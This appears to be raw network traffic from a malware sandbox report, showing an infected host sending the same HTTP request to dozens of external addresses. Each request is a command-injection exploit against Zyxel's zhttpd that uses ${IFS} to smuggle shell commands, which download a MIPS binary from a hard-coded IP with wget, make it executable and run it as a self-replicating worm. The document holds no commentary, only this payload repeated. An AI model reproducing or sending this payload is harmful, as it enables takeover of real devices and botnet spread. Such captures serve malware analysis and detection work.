                                      Jan 14, 2024 15:50:50.401299953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5403192.168.2.146096677.73.184.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.401376963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5404192.168.2.1455752167.37.180.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.401416063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5405192.168.2.1437928182.212.209.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.401488066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5406192.168.2.144253473.238.102.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.401530981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5407192.168.2.143677234.181.91.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.401587963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5408192.168.2.1450712129.92.119.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.401618958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5409192.168.2.1434350187.97.248.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.401690006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5410192.168.2.145202697.246.55.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.401772022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5411192.168.2.1458186117.190.131.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.401827097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5412192.168.2.1433690139.166.192.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.401878119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5413192.168.2.1459524120.86.49.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.401928902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5414192.168.2.143683496.178.98.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.401984930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5415192.168.2.1434246166.173.6.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.402031898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5416192.168.2.1442202130.80.22.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.402086020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5417192.168.2.144985040.1.131.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.402143955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5418192.168.2.1433120185.210.116.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.402203083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5419192.168.2.144648627.210.129.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.402266979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5420192.168.2.1460590104.94.255.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.402313948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5421192.168.2.1448524163.209.38.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.402365923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5422192.168.2.1450146199.32.109.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.402400970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5423192.168.2.145935095.224.17.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.402462006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5424192.168.2.1459078131.126.180.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.402512074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5425192.168.2.1452940154.94.31.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.402549028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5426192.168.2.1454864134.136.205.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.402612925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5427192.168.2.1434688160.147.65.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.402658939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5428192.168.2.143314872.243.237.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.402688980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5429192.168.2.1437056140.7.41.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.402776957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5430192.168.2.1452662126.130.186.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.402816057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5431192.168.2.1455396142.81.96.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.402887106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5432192.168.2.14329261.99.77.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.402928114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5433192.168.2.143920870.80.78.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.402985096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5434192.168.2.1434446137.206.242.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.403017044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5435192.168.2.1452730116.67.255.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.403100014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5436192.168.2.1450998169.244.178.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.403131008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5437192.168.2.1445574206.253.167.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.403203964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5438192.168.2.143969012.25.63.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.403255939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5439192.168.2.1446452220.32.10.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.403315067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5440192.168.2.1444352129.145.117.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.403376102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5441192.168.2.1448072195.169.132.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.403425932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5442192.168.2.145856879.3.0.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.403493881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5443192.168.2.1445846222.129.239.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.403510094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5444192.168.2.143800072.144.31.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.403574944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5445192.168.2.1437310221.64.129.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.403640985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5446192.168.2.1447290136.99.232.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.403695107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5447192.168.2.1441928147.33.93.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.403772116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5448192.168.2.145946268.75.77.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.403814077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5449192.168.2.1458722106.120.138.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.403860092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5450192.168.2.1460072208.36.254.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.403917074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5451192.168.2.1441796120.0.46.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.403980017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5452192.168.2.14451682.123.163.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.404037952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5453192.168.2.145225080.42.87.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.404077053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5454192.168.2.144205481.190.182.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.404155016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5455192.168.2.145169062.198.102.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.404206038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5456192.168.2.144882668.150.106.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.404242039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5457192.168.2.144106871.215.7.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.404298067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5458192.168.2.1436056175.15.150.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.404375076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5459192.168.2.1447426209.71.24.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.404431105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5460192.168.2.1445806173.86.31.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.404468060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5461192.168.2.1450706115.243.23.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.404521942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5462192.168.2.1454984186.110.222.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.404577017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5463192.168.2.1440938101.17.222.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.404642105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5464192.168.2.1443068220.151.196.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.404681921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5465192.168.2.145582036.193.8.42443
                                      TimestampBytes transferredDirectionData
